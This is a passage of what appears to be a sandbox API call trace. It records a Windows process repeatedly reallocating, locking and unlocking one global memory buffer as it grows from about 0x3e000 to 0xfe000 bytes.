[0263.214] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.214] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x3e000, uFlags=0x2) returned 0xcc008c [0263.214] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.215] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.215] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.215] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x40000, uFlags=0x2) returned 0xcc008c [0263.215] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.216] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.216] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.216] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x42000, uFlags=0x2) returned 0xcc008c [0263.216] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.217] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.217] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.217] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x44000, uFlags=0x2) returned 0xcc008c [0263.217] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.218] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.218] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.218] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x46000, uFlags=0x2) returned 0xcc008c [0263.218] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.219] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.219] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.219] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x48000, uFlags=0x2) returned 0xcc008c [0263.219] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.220] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.220] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.220] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x4a000, uFlags=0x2) returned 0xcc008c [0263.220] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.221] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.221] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.221] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x4c000, uFlags=0x2) returned 0xcc008c [0263.221] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.222] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.222] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.222] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x4e000, uFlags=0x2) returned 0xcc008c [0263.222] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.223] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.223] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.223] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x50000, uFlags=0x2) returned 0xcc008c [0263.223] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.224] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.224] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.224] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x52000, uFlags=0x2) returned 0xcc008c [0263.224] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.225] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.225] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.225] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x54000, uFlags=0x2) returned 0xcc008c [0263.225] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.226] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.226] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.226] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x56000, uFlags=0x2) returned 0xcc008c [0263.226] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.227] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.227] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.227] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x58000, uFlags=0x2) returned 0xcc008c [0263.227] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.228] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.228] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.228] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x5a000, uFlags=0x2) returned 0xcc008c [0263.228] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.229] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.229] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.229] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x5c000, uFlags=0x2) returned 0xcc008c [0263.229] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.230] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.230] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.230] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x5e000, uFlags=0x2) returned 0xcc008c [0263.230] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.231] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.231] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.231] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x60000, uFlags=0x2) returned 0xcc008c [0263.231] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.232] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.232] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.232] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x62000, uFlags=0x2) returned 0xcc008c [0263.232] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.233] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.233] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.233] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x64000, uFlags=0x2) returned 0xcc008c [0263.233] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.234] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.234] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.234] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x66000, uFlags=0x2) returned 0xcc008c [0263.234] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.235] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.235] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.235] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x68000, uFlags=0x2) returned 0xcc008c [0263.235] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.236] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.236] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.236] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x6a000, uFlags=0x2) returned 0xcc008c [0263.236] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.237] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.237] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.237] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x6c000, uFlags=0x2) returned 0xcc008c [0263.237] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.238] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.238] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.238] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x6e000, uFlags=0x2) returned 0xcc008c [0263.238] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.239] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.239] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.239] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x70000, uFlags=0x2) returned 0xcc008c [0263.239] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.240] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.240] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.240] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x72000, uFlags=0x2) returned 0xcc008c [0263.240] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.241] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.241] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.241] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x74000, uFlags=0x2) returned 0xcc008c [0263.241] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.242] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.242] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.242] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x76000, uFlags=0x2) returned 0xcc008c [0263.242] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.243] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.243] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.243] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x78000, uFlags=0x2) returned 0xcc008c [0263.243] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.244] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.244] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.244] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x7a000, uFlags=0x2) returned 0xcc008c [0263.244] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.245] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.245] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.245] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x7c000, uFlags=0x2) returned 0xcc008c [0263.245] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.246] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.246] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.246] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x7e000, uFlags=0x2) returned 0xcc008c [0263.246] GlobalLock (hMem=0xcc008c) returned 0x55f0048 [0263.247] GlobalHandle (pMem=0x55f0048) returned 0xcc008c [0263.247] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.247] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x80000, uFlags=0x2) returned 0xcc008c [0263.266] GlobalLock (hMem=0xcc008c) returned 0x4c60020 [0263.267] GlobalHandle (pMem=0x4c60020) returned 0xcc008c [0263.267] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.267] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x82000, uFlags=0x2) returned 0xcc008c [0263.302] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0263.304] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0263.304] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.304] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x84000, uFlags=0x2) returned 0xcc008c [0263.317] GlobalLock (hMem=0xcc008c) returned 0x4c60020 [0263.318] GlobalHandle (pMem=0x4c60020) returned 0xcc008c [0263.318] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.318] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x86000, uFlags=0x2) returned 0xcc008c [0263.337] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0263.339] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0263.339] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.339] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x88000, uFlags=0x2) returned 0xcc008c [0263.352] GlobalLock (hMem=0xcc008c) returned 0x4c60020 [0263.352] GlobalHandle (pMem=0x4c60020) returned 0xcc008c [0263.352] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.352] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x8a000, uFlags=0x2) returned 0xcc008c [0263.365] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0263.367] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0263.367] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.367] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x8c000, uFlags=0x2) returned 0xcc008c [0263.380] GlobalLock (hMem=0xcc008c) returned 0x4c60020 [0263.381] GlobalHandle (pMem=0x4c60020) returned 0xcc008c [0263.381] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.381] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x8e000, uFlags=0x2) returned 0xcc008c [0263.394] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0263.395] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0263.395] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.395] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x90000, uFlags=0x2) returned 0xcc008c [0263.425] GlobalLock (hMem=0xcc008c) returned 0x4c60020 [0263.426] GlobalHandle (pMem=0x4c60020) returned 0xcc008c [0263.426] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.426] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x92000, uFlags=0x2) returned 0xcc008c [0263.449] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0263.450] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0263.450] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.450] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x94000, uFlags=0x2) returned 0xcc008c [0263.472] GlobalLock (hMem=0xcc008c) returned 0x4c60020 [0263.473] GlobalHandle (pMem=0x4c60020) returned 0xcc008c [0263.473] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.473] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x96000, uFlags=0x2) returned 0xcc008c [0263.487] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0263.488] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0263.488] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.488] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x98000, uFlags=0x2) returned 0xcc008c [0263.502] GlobalLock (hMem=0xcc008c) returned 0x4c60020 [0263.503] GlobalHandle (pMem=0x4c60020) returned 0xcc008c [0263.503] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.503] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x9a000, uFlags=0x2) returned 0xcc008c [0263.517] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0263.518] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0263.518] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.518] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x9c000, uFlags=0x2) returned 0xcc008c [0263.534] GlobalLock (hMem=0xcc008c) returned 0x4c60020 [0263.534] GlobalHandle (pMem=0x4c60020) returned 0xcc008c [0263.534] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.534] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x9e000, uFlags=0x2) returned 0xcc008c [0263.549] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0263.550] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0263.551] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.551] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xa0000, uFlags=0x2) returned 0xcc008c [0263.565] GlobalLock (hMem=0xcc008c) returned 0x5890020 [0263.566] GlobalHandle (pMem=0x5890020) returned 0xcc008c [0263.566] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.566] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xa2000, uFlags=0x2) returned 0xcc008c [0263.581] GlobalLock (hMem=0xcc008c) returned 0x5940020 [0263.582] GlobalHandle (pMem=0x5940020) returned 0xcc008c [0263.582] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.582] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xa4000, uFlags=0x2) returned 0xcc008c [0263.612] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0263.613] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0263.613] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.613] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xa6000, uFlags=0x2) returned 0xcc008c [0263.629] GlobalLock (hMem=0xcc008c) returned 0x58a0020 [0263.630] GlobalHandle (pMem=0x58a0020) returned 0xcc008c [0263.630] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.630] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xa8000, uFlags=0x2) returned 0xcc008c [0263.927] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0263.928] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0263.928] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.928] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xaa000, uFlags=0x2) returned 0xcc008c [0263.944] GlobalLock (hMem=0xcc008c) returned 0x58a0020 [0263.945] GlobalHandle (pMem=0x58a0020) returned 0xcc008c [0263.945] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.945] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xac000, uFlags=0x2) returned 0xcc008c [0263.962] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0263.963] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0263.963] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.963] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xae000, uFlags=0x2) returned 0xcc008c [0263.986] GlobalLock (hMem=0xcc008c) returned 0x58a0020 [0263.987] GlobalHandle (pMem=0x58a0020) returned 0xcc008c [0263.987] GlobalUnlock (hMem=0xcc008c) returned 0 [0263.987] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xb0000, uFlags=0x2) returned 0xcc008c [0264.004] GlobalLock (hMem=0xcc008c) returned 0x5950020 [0264.005] GlobalHandle (pMem=0x5950020) returned 0xcc008c [0264.005] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.005] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xb2000, uFlags=0x2) returned 0xcc008c [0264.021] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.022] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.022] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.022] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xb4000, uFlags=0x2) returned 0xcc008c [0264.050] GlobalLock (hMem=0xcc008c) returned 0x58b0020 [0264.051] GlobalHandle (pMem=0x58b0020) returned 0xcc008c [0264.051] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.051] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xb6000, uFlags=0x2) returned 0xcc008c [0264.068] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.069] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.069] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.069] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xb8000, uFlags=0x2) returned 0xcc008c [0264.103] GlobalLock (hMem=0xcc008c) returned 0x58b0020 [0264.104] GlobalHandle (pMem=0x58b0020) returned 0xcc008c [0264.104] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.104] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xba000, uFlags=0x2) returned 0xcc008c [0264.121] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.122] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.122] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.122] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xbc000, uFlags=0x2) returned 0xcc008c [0264.140] GlobalLock (hMem=0xcc008c) returned 0x58b0020 [0264.141] GlobalHandle (pMem=0x58b0020) returned 0xcc008c [0264.141] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.141] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xbe000, uFlags=0x2) returned 0xcc008c [0264.163] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.164] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.164] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.164] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xc0000, uFlags=0x2) returned 0xcc008c [0264.182] GlobalLock (hMem=0xcc008c) returned 0x58b0020 [0264.183] GlobalHandle (pMem=0x58b0020) returned 0xcc008c [0264.183] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.183] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xc2000, uFlags=0x2) returned 0xcc008c [0264.202] GlobalLock (hMem=0xcc008c) returned 0x5980020 [0264.203] GlobalHandle (pMem=0x5980020) returned 0xcc008c [0264.203] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.203] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xc4000, uFlags=0x2) returned 0xcc008c [0264.230] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.231] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.231] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.231] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xc6000, uFlags=0x2) returned 0xcc008c [0264.249] GlobalLock (hMem=0xcc008c) returned 0x58c0020 [0264.250] GlobalHandle (pMem=0x58c0020) returned 0xcc008c [0264.250] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.250] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xc8000, uFlags=0x2) returned 0xcc008c [0264.271] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.272] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.272] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.272] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xca000, uFlags=0x2) returned 0xcc008c [0264.290] GlobalLock (hMem=0xcc008c) returned 0x58c0020 [0264.291] GlobalHandle (pMem=0x58c0020) returned 0xcc008c [0264.291] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.291] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xcc000, uFlags=0x2) returned 0xcc008c [0264.309] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.311] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.311] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.311] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xce000, uFlags=0x2) returned 0xcc008c [0264.330] GlobalLock (hMem=0xcc008c) returned 0x58c0020 [0264.331] GlobalHandle (pMem=0x58c0020) returned 0xcc008c [0264.331] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.331] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xd0000, uFlags=0x2) returned 0xcc008c [0264.359] GlobalLock (hMem=0xcc008c) returned 0x5990020 [0264.360] GlobalHandle (pMem=0x5990020) returned 0xcc008c [0264.360] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.360] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xd2000, uFlags=0x2) returned 0xcc008c [0264.383] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.384] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.384] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.384] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xd4000, uFlags=0x2) returned 0xcc008c [0264.404] GlobalLock (hMem=0xcc008c) returned 0x58d0020 [0264.405] GlobalHandle (pMem=0x58d0020) returned 0xcc008c [0264.405] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.405] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xd6000, uFlags=0x2) returned 0xcc008c [0264.426] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.427] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.427] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.427] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xd8000, uFlags=0x2) returned 0xcc008c [0264.447] GlobalLock (hMem=0xcc008c) returned 0x58d0020 [0264.448] GlobalHandle (pMem=0x58d0020) returned 0xcc008c [0264.448] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.448] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xda000, uFlags=0x2) returned 0xcc008c [0264.490] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.491] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.491] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.492] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xdc000, uFlags=0x2) returned 0xcc008c [0264.513] GlobalLock (hMem=0xcc008c) returned 0x58d0020 [0264.514] GlobalHandle (pMem=0x58d0020) returned 0xcc008c [0264.514] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.514] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xde000, uFlags=0x2) returned 0xcc008c [0264.538] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.539] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.539] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.539] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xe0000, uFlags=0x2) returned 0xcc008c [0264.562] GlobalLock (hMem=0xcc008c) returned 0x58d0020 [0264.564] GlobalHandle (pMem=0x58d0020) returned 0xcc008c [0264.564] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.564] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xe2000, uFlags=0x2) returned 0xcc008c [0264.588] GlobalLock (hMem=0xcc008c) returned 0x59c0020 [0264.590] GlobalHandle (pMem=0x59c0020) returned 0xcc008c [0264.590] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.590] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xe4000, uFlags=0x2) returned 0xcc008c [0264.613] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.614] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.614] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.614] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xe6000, uFlags=0x2) returned 0xcc008c [0264.648] GlobalLock (hMem=0xcc008c) returned 0x58e0020 [0264.649] GlobalHandle (pMem=0x58e0020) returned 0xcc008c [0264.649] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.649] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xe8000, uFlags=0x2) returned 0xcc008c [0264.672] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.673] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.673] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.673] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xea000, uFlags=0x2) returned 0xcc008c [0264.699] GlobalLock (hMem=0xcc008c) returned 0x58e0020 [0264.700] GlobalHandle (pMem=0x58e0020) returned 0xcc008c [0264.700] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.700] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xec000, uFlags=0x2) returned 0xcc008c [0264.726] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.727] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.727] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.727] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xee000, uFlags=0x2) returned 0xcc008c [0264.751] GlobalLock (hMem=0xcc008c) returned 0x58e0020 [0264.753] GlobalHandle (pMem=0x58e0020) returned 0xcc008c [0264.753] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.753] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xf0000, uFlags=0x2) returned 0xcc008c [0264.790] GlobalLock (hMem=0xcc008c) returned 0x59d0020 [0264.792] GlobalHandle (pMem=0x59d0020) returned 0xcc008c [0264.792] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.792] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xf2000, uFlags=0x2) returned 0xcc008c [0264.817] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.818] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.818] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.818] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xf4000, uFlags=0x2) returned 0xcc008c [0264.843] GlobalLock (hMem=0xcc008c) returned 0x58f0020 [0264.844] GlobalHandle (pMem=0x58f0020) returned 0xcc008c [0264.844] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.844] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xf6000, uFlags=0x2) returned 0xcc008c [0264.870] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0264.871] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0264.871] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.871] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xf8000, uFlags=0x2) returned 0xcc008c [0264.899] GlobalLock (hMem=0xcc008c) returned 0x58f0020 [0264.900] GlobalHandle (pMem=0x58f0020) returned 0xcc008c [0264.900] GlobalUnlock (hMem=0xcc008c) returned 0 [0264.900] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xfa000, uFlags=0x2) returned 0xcc008c [0265.156] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0265.157] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0265.157] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.157] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xfc000, uFlags=0x2) returned 0xcc008c [0265.183] GlobalLock (hMem=0xcc008c) returned 0x58f0020 [0265.184] GlobalHandle (pMem=0x58f0020) returned 0xcc008c [0265.184] GlobalUnlock (hMem=0xcc008c) returned 0 [0265.184] GlobalReAlloc (hMem=0xcc008c, dwBytes=0xfe000, 